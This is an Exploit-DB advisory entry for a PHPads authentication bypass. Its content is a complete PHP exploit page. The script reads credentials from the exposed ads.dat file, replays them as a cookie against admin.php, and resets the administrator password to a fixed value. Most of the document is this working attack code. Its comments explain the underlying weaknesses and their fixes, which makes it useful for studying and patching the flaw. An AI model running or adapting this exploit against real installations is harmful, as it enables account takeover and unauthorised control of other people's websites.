PHPads <= 213607 - Authentication Bypass / Password Change Exploit

2014-12-15T00:00:00
ID EDB-ID:35535
Type exploitdb
Reporter Shaker msallm
Modified 2014-12-15T00:00:00

Description

PHPads <= 213607 - Authentication Bypass / Password Change Exploit. Web-application exploit for the PHP platform.

                                        
                                            &lt;title&gt; PHPads Authentication Bypass  Exploit &lt;/title&gt;
&lt;pre&gt;
PHPads Authentication Bypass / Administrator Password Change Exploit
&lt;form method="POST"&gt;
Target  : &lt;br&gt;&lt;input type="text" name="target" value="&lt;? if($_POST['target']) {echo $_POST['target']; }else{echo 'http://localhost:4545/phpads';} ?&gt;" size="70" /&gt;&lt;br /&gt;&lt;input type="submit" name="submit" /&gt;
&lt;/form&gt;
&lt;?php
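/**
 * Return the text found between $start and $end in $string, or null when
 * the pair is not present.
 *
 * Both delimiters are treated as literal text (preg_quote), so a "/" or a
 * regex metacharacter in a delimiter can no longer corrupt the pattern.
 * "." does not match a newline, so the capture stops at the first line end.
 */
function catchya($string, $start, $end)
{
	$pattern = '/' . preg_quote($start, '/') . '(.*)' . preg_quote($end, '/') . '/';
	if (preg_match($pattern, $string, $matches) !== 1) {
		// No match (or a PCRE error): report absence explicitly instead of
		// reading an undefined offset of $matches.
		return null;
	}
	return $matches[1];
}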

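/**
 * Read the credential pair that PHPads keeps in its web-readable ads.dat.
 *
 * $target is the base URL of the installation; the file is fetched over
 * HTTP as $target/ads.dat and its "user=" and "pass=" lines are extracted
 * with catchya(). This is the root cause of the advisory: the data file is
 * served from inside the web root and the pass= value it holds is usable
 * as-is (adminchange() replays it in a cookie). On the application side the
 * fix is to keep the file outside the document root, or deny it in the web
 * server configuration, and not to store a directly replayable credential.
 *
 * Returns array(username, password); either element is null when the
 * request failed or the corresponding line is absent.
 */
function login($target)
{
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target . "/ads.dat");
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	$result = curl_exec($ch);
	// Release the handle before returning; the original closed it after the
	// return statement, so the close never ran.
	curl_close($ch);
	if ($result === false) {
		return array(null, null);
	}
	$username = catchya($result, "user=", "\n");
	$password = catchya($result, "pass=", "\n");
	return array($username, $password);
}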

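/**
 * Replay the harvested credentials against the admin configuration page
 * and submit a password change.
 *
 * $target is the full URL of the config action (the caller appends
 * "/admin.php?action=config"). The request authenticates with nothing but
 * a "user=...; pass=..." cookie built from the values read out of ads.dat,
 * which is the second weakness this advisory documents: the application
 * trusts credentials carried in a client-controlled cookie. Mitigation on
 * the application side is a server-side session (or signed token) rather
 * than raw credentials in the cookie, and a CSRF token on state-changing
 * admin actions -- the POST built here carries none, which suggests the
 * page does not require one.
 *
 * Success is detected by the string "Code Generator" appearing in the
 * response. Returns an HTML fragment describing the outcome.
 */
function adminchange($target, $username, $password)
{
	$post = array(
		'save' =&gt; '1',
		'newlogin' =&gt; $username,
		'newpass' =&gt; "htlover",
	);
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_COOKIE, 'user=' . $username . '; pass=' . $password);
	curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
	$result = curl_exec($ch);
	// Close the handle before returning; in the original the curl_close()
	// sat after the return and never executed.
	curl_close($ch);
	// A failed transfer (false) is reported the same way as a response that
	// does not contain the success marker.
	$changed = $result !== false ? preg_match("/Code Generator/", $result) === 1 : false;
	if ($changed) {
		return "&lt;br&gt;&lt;br&gt;&lt;font color=green&gt;Success !! Password changed &lt;/font&gt;&lt;br&gt;username: ".$username." | password: htlover";
	}
	return "Something wrong &lt;br&gt;";
}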

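// Form handler: read the target, harvest the credentials and attempt the
// password change, echoing each step into the surrounding &lt;pre&gt;.
if (isset($_POST['submit']))
{
	// The target URL comes straight from the form and the harvested values
	// come from a remote file; both are echoed back into HTML, so escape
	// them for that context to keep this page free of reflected XSS.
	$target = isset($_POST['target']) ? (string) $_POST['target'] : '';
	$logins = login($target);
	echo "USERNAME :" . htmlspecialchars((string) $logins[0], ENT_QUOTES, 'UTF-8'); // username
	echo "&lt;br&gt;PASSWORD :" . htmlspecialchars((string) $logins[1], ENT_QUOTES, 'UTF-8'); // password
	// adminchange() returns its own HTML fragment, so it is echoed as-is.
	echo adminchange($target . '/admin.php?action=config', $logins[0], $logins[1]);
}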




?&gt;
&lt;/pre&gt;